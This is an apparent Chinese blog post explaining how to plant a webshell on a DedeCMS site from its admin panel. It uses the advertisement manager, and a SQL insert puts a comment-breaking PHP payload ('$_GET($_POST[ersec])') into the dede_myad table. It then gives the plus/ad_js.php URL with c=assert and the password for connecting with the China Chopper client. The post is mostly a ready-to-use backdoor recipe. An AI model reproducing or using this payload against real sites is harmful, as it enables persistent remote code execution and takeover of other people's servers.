DEDEcms另外一种办法拿shell

进入后台 模块 广告管理器  然后增加一个广告

内容都填写

如下图

2

 

–><!–

 

 

 插入后

如下图  记下广告的编号

5

上图广告的编号为42

 

然后shell地址为https://phpinfo.me/plus/ad_js.php?aid=42&c=assert菜刀连接 密码ersec

 

34

 

 

–>

 

insert into  `dede_myad`(aid,normbody)values(30,’–><?php $_GET($_POST[ersec]);?><!–‘)
http://www.xx.com//plus/ad_js.php?aid=30&c=assert  密码esec

文 / admin
LEAVE A REPLY

loading